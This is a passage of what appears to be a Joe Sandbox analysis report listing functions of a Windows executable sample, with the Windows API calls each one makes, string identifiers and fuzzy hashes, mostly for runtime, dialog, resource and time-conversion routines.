                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID:
                • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                • API String ID: 0-1718035505
                • Opcode ID: 0692e09cf2a50d1946201c8eb98c9f5fd981e5d268ad084af8d2afd5d61ae146
                • Instruction ID: 571d96acc95bebcd0a2b912ea9fd1c38374c51c331b4f489b083285f32c408b5
                • Opcode Fuzzy Hash: 0692e09cf2a50d1946201c8eb98c9f5fd981e5d268ad084af8d2afd5d61ae146
                • Instruction Fuzzy Hash: C1012D31E413625BCF205F765C956EB5798BB51393330227BE542D3380EA95CC4AE6A4
                Function 004F8060 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 004F807E
                  • Part of subcall function 004F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?), ref: 004F84F4
                  • Part of subcall function 004F84DE: GetLastError.KERNEL32(?,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?,?), ref: 004F8506
                • _free.LIBCMT ref: 004F8090
                • _free.LIBCMT ref: 004F80A3
                • _free.LIBCMT ref: 004F80B4
                • _free.LIBCMT ref: 004F80C5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID: P
                • API String ID: 776569668-2113778011
                • Opcode ID: 7e3aef3d9d280a65bef643b23d2c6ecb8d9a25ed9e78b95e998d8f1275ee2a77
                • Instruction ID: 93432180294a008b63640705e5fd91bb978478638215ff3508343c25d4797847
                • Opcode Fuzzy Hash: 7e3aef3d9d280a65bef643b23d2c6ecb8d9a25ed9e78b95e998d8f1275ee2a77
                • Instruction Fuzzy Hash: C5F01DBA8019299BC7126B26BC0342A3A65F724720319460FF9009EB70DF390459AFCD
                Function 004E0CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                Download Yara Rule
                APIs
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 004E0D0D
                  • Part of subcall function 004DACF5: GetVersionExW.KERNEL32(?), ref: 004DAD1A
                • LocalFileTimeToFileTime.KERNEL32(?,004E0CB8), ref: 004E0D31
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 004E0D47
                • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 004E0D56
                • SystemTimeToFileTime.KERNEL32(?,004E0CB8), ref: 004E0D64
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 004E0D72
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion
                • String ID:
                • API String ID: 2092733347-0
                • Opcode ID: f7481b1f0e8b103d5864ffd0202d528db657d0b6eb6fc6d83fbc654b0a2a9863
                • Instruction ID: 6ed25b8a06165a43f18cdbf50b8496a4da9c6ddf10bccf60540f0fcd9ec4b77f
                • Opcode Fuzzy Hash: f7481b1f0e8b103d5864ffd0202d528db657d0b6eb6fc6d83fbc654b0a2a9863
                • Instruction Fuzzy Hash: 6731E97A900249EBCB00DFE5C8859EFFBBCFF58700B04455AE955E3610E7349685CB69
                Function 004E91B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: _memcmp
                • String ID:
                • API String ID: 2931989736-0
                • Opcode ID: b8cb838b7b7ff36935d7bf23b3a1bea926ac2dbacab327cbe40c8a5ca6b58780
                • Instruction ID: fb466d006750e9809ecf5c59c01ae00c888a0e17fd30be69f34a0895c4f4c563
                • Opcode Fuzzy Hash: b8cb838b7b7ff36935d7bf23b3a1bea926ac2dbacab327cbe40c8a5ca6b58780
                • Instruction Fuzzy Hash: 5C21077160014E7BDB049E12CC81E7F7BADAB50749B14896AFD0997381F238DD454695
                Function 004ED2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
                Download Yara Rule
                APIs
                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 004ED2F2
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004ED30C
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004ED31D
                • TranslateMessage.USER32(?), ref: 004ED327
                • DispatchMessageW.USER32(?), ref: 004ED331
                • WaitForSingleObject.KERNEL32(?,0000000A), ref: 004ED33C
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                • String ID:
                • API String ID: 2148572870-0
                • Opcode ID: 71ecdfa824c498bb3d0486b2ccd264631660383162aafd906a377a51254f17e1
                • Instruction ID: 62ab9ee3bdb6c7d2abcd20140749c582652a42828893f3f2a04f74519292322e
                • Opcode Fuzzy Hash: 71ecdfa824c498bb3d0486b2ccd264631660383162aafd906a377a51254f17e1
                • Instruction Fuzzy Hash: 66F03C72E02119ABCB205BA2DC4CEDFBF6DEF61392F008012FA06D2110D6388549D7A1
                Function 004EC40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                Download Yara Rule
                APIs
                • _wcschr.LIBVCRUNTIME ref: 004EC435
                  • Part of subcall function 004E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004DBB05,00000000,.exe,?,?,00000800,?,?,004E85DF,?), ref: 004E17C2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CompareString_wcschr
                • String ID: <$HIDE$MAX$MIN
                • API String ID: 2548945186-3358265660
                • Opcode ID: 98616d5a19ac21df41809a37a2568ebff13c6f670cdc8f00b775a3814b60b59f
                • Instruction ID: 12d124536dfcdd79e1d536b70153fb23059191888a41bbb49fcc599c60a4418c
                • Opcode Fuzzy Hash: 98616d5a19ac21df41809a37a2568ebff13c6f670cdc8f00b775a3814b60b59f
                • Instruction Fuzzy Hash: C931A176900289AADF21DA96CC81FEF77BCEB14305F0040A7FA45D6190EBB89FC58A54
                Function 004EA990 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004D130B: GetDlgItem.USER32(00000000,00003021), ref: 004D134F
                  • Part of subcall function 004D130B: SetWindowTextW.USER32(00000000,005035B4), ref: 004D1365
                • EndDialog.USER32(?,00000001), ref: 004EA9DE
                • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 004EA9F6
                • SetDlgItemTextW.USER32(?,00000067,?), ref: 004EAA24
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: GETPASSWORD1$xjR
                • API String ID: 445417207-3697140082
                • Opcode ID: 4d834347c9e5e44e04e54795ceb5ca5654f1d6b17710d199d5ce98bc7ced33b9
                • Instruction ID: 712b54f927f0e88684f603977713a9b168551cb34e95f09055e8b4f2c775384d
                • Opcode Fuzzy Hash: 4d834347c9e5e44e04e54795ceb5ca5654f1d6b17710d199d5ce98bc7ced33b9
                • Instruction Fuzzy Hash: 4A116F7294011876DB219E669D09FFB3B7CEF19706F000423FA45F3291C268AD65D677
                Function 004EADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
                Download Yara Rule
                APIs
                • LoadBitmapW.USER32(00000065), ref: 004EADFD
                • GetObjectW.GDI32(00000000,00000018,?), ref: 004EAE22
                • DeleteObject.GDI32(00000000), ref: 004EAE54
                • DeleteObject.GDI32(00000000), ref: 004EAE77
                  • Part of subcall function 004E9E1C: FindResourceW.KERNEL32(004EAE4D,PNG,?,?,?,004EAE4D,00000066), ref: 004E9E2E
                  • Part of subcall function 004E9E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,004EAE4D,00000066), ref: 004E9E46
                  • Part of subcall function 004E9E1C: LoadResource.KERNEL32(00000000,?,?,?,004EAE4D,00000066), ref: 004E9E59
                  • Part of subcall function 004E9E1C: LockResource.KERNEL32(00000000,?,?,?,004EAE4D,00000066), ref: 004E9E64
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                • String ID: ]
                • API String ID: 142272564-3352871620
                • Opcode ID: 540ea6bcee83571a6fc386ce71e3d30592d6f29b8b91b135ae06f7e28eaec556
                • Instruction ID: 0c722db2097f0e00923be137bc77bf1f6d98c9b25e726a309fff3aa43c638c41
                • Opcode Fuzzy Hash: 540ea6bcee83571a6fc386ce71e3d30592d6f29b8b91b135ae06f7e28eaec556
                • Instruction Fuzzy Hash: 01012B32980665A7C710676B5C0AF7F7B799B81B43F080116FD00A73D1DB394C2996B6
                Function 004ECC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004D130B: GetDlgItem.USER32(00000000,00003021), ref: 004D134F
                  • Part of subcall function 004D130B: SetWindowTextW.USER32(00000000,005035B4), ref: 004D1365
                • EndDialog.USER32(?,00000001), ref: 004ECCDB
                • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 004ECCF1
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 004ECD05
                • SetDlgItemTextW.USER32(?,00000068), ref: 004ECD14
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: RENAMEDLG
                • API String ID: 445417207-3299779563
                • Opcode ID: 9c5c6bdcbbe53da87e46642b4259be437df524ecea4e41c896bd524f2f2948b7
                • Instruction ID: f30727f5ebcb10b635dbf9802189e16ea381e341974fec0c6116d288551e0166
                • Opcode Fuzzy Hash: 9c5c6bdcbbe53da87e46642b4259be437df524ecea4e41c896bd524f2f2948b7
                • Instruction Fuzzy Hash: 79012D322843507AD1214F659D49F973B6DEB66743F200412F345A12E0C66A591BE769
                Function 004F2503 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • ___BuildCatchObject.LIBVCRUNTIME ref: 004F251A
                  • Part of subcall function 004F2B52: ___AdjustPointer.LIBCMT ref: 004F2B9C
                • _UnwindNestedFrames.LIBCMT ref: 004F2531
                • ___FrameUnwindToState.LIBVCRUNTIME ref: 004F2543
                • CallCatchBlock.LIBVCRUNTIME ref: 004F2567
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                • String ID: /)O
                • API String ID: 2633735394-1853168421
                • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                • Instruction ID: b783c4b34974892bd8706c5e7c9501d67867ea9b7a1bc25a18e1ec31d72b6fac
                • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                • Instruction Fuzzy Hash: 63012D3200010DBBCF129F56CD11EEA3BBAFF58714F15401AFE1865120C37AE961DBA9
                Function 004F75C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004F7573,00000000,?,004F7513,00000000,0050BAD8,0000000C,004F766A,00000000,00000002), ref: 004F75E2
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004F75F5
                • FreeLibrary.KERNEL32(00000000,?,?,?,004F7573,00000000,?,004F7513,00000000,0050BAD8,0000000C,004F766A,00000000,00000002), ref: 004F7618
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 548f32fa6d3d152d718857dce5e6cc55c7cd0decaea3f00f454b14d51a2d4f26
                • Instruction ID: 8c76ab6d203902b80f757e7495ca21eae22c2fde9e3accf9702ec3a17d2937f6
                • Opcode Fuzzy Hash: 548f32fa6d3d152d718857dce5e6cc55c7cd0decaea3f00f454b14d51a2d4f26
                • Instruction Fuzzy Hash: 72F0C83060851DBBDB159F55DC09BAEBFB8EF04711F104069F805E2250EF388E44DB54
                Function 004DEB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004E00A0
                  • Part of subcall function 004E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004DEB86,Crypt32.dll,00000000,004DEC0A,?,?,004DEBEC,?,?,?), ref: 004E00C2
                • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 004DEB92
                • GetProcAddress.KERNEL32(005181C0,CryptUnprotectMemory), ref: 004DEBA2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: AddressProc$DirectoryLibraryLoadSystem
                • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                • API String ID: 2141747552-1753850145
                • Opcode ID: f9fe74b6b32994e3aeaa9ef0c3b1b5deb1ffd9bcc93bd0668597b896b87a2d72
                • Instruction ID: 7fe920367a4d2eb262575ac33705f7cc267f5906bb35085078822f1b01fafe0b
                • Opcode Fuzzy Hash: f9fe74b6b32994e3aeaa9ef0c3b1b5deb1ffd9bcc93bd0668597b896b87a2d72
                • Instruction Fuzzy Hash: 98E04F704017419EDB309F3A9818B4ABEE86B14705F008C1FE4D6D3290D6F8E5849B60
                Function 004F7DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: 08c34b9d94c4f5edad5c6da8650a81fdc0a06d956d0c3725e549919d4eb1ce15
                • Instruction ID: eff1ebbbb83651b478743d6b39fe4c0a8887e8e7de5bd60727601821af11cb5b
                • Opcode Fuzzy Hash: 08c34b9d94c4f5edad5c6da8650a81fdc0a06d956d0c3725e549919d4eb1ce15
                • Instruction Fuzzy Hash: 9B41F532A00308AFDB14DF79C881A6EB7A5EF85314F5545AEE615EB341DB39ED01CB84
                Function 004FB610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                Download Yara Rule
                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 004FB619
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004FB63C
                  • Part of subcall function 004F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004FC13D,00000000,?,004F67E2,?,00000008,?,004F89AD,?,?,?), ref: 004F854A
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004FB662
                • _free.LIBCMT ref: 004FB675
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004FB684
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                • String ID:
                • API String ID: 336800556-0
                • Opcode ID: 450114e0b805a22a163933e95661f8921ee7d4f62bd10bb5401e9ce40b7eab2b
                • Instruction ID: f03d0ce1eba8b354a46b36bd32eace5ff2ae51dc20680df0a3d9aab531ad847e
                • Opcode Fuzzy Hash: 450114e0b805a22a163933e95661f8921ee7d4f62bd10bb5401e9ce40b7eab2b
                • Instruction Fuzzy Hash: DF017172601619BBB3211676AC88D7F6A6DDEC7BA4325022EBE04C6210DF688D0191FA
                Function 004E075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 004E0A41: ResetEvent.KERNEL32(?), ref: 004E0A53
                  • Part of subcall function 004E0A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 004E0A67
                • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 004E078F
                • CloseHandle.KERNEL32(?,?), ref: 004E07A9
                • DeleteCriticalSection.KERNEL32(?), ref: 004E07C2
                • CloseHandle.KERNEL32(?), ref: 004E07CE
                • CloseHandle.KERNEL32(?), ref: 004E07DA
                  • Part of subcall function 004E084E: WaitForSingleObject.KERNEL32(?,000000FF,004E0A78,?), ref: 004E0854
                  • Part of subcall function 004E084E: GetLastError.KERNEL32(?), ref: 004E0860
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                • String ID:
                • API String ID: 1868215902-0
                • Opcode ID: 368babb7a3c1b4709ed7eabe768585c374d0f3597e30e139ede721e77b8970d6
                • Instruction ID: 57665e1a1f26302a5624cc81b9eafe7b9cb0f3c047a0f68abffc0c4dcbb6bd55
                • Opcode Fuzzy Hash: 368babb7a3c1b4709ed7eabe768585c374d0f3597e30e139ede721e77b8970d6
                • Instruction Fuzzy Hash: E501F571000B44EFC7219F66DC88FCABBEDFB48711F004529F16A42160CBB52A48DBA4
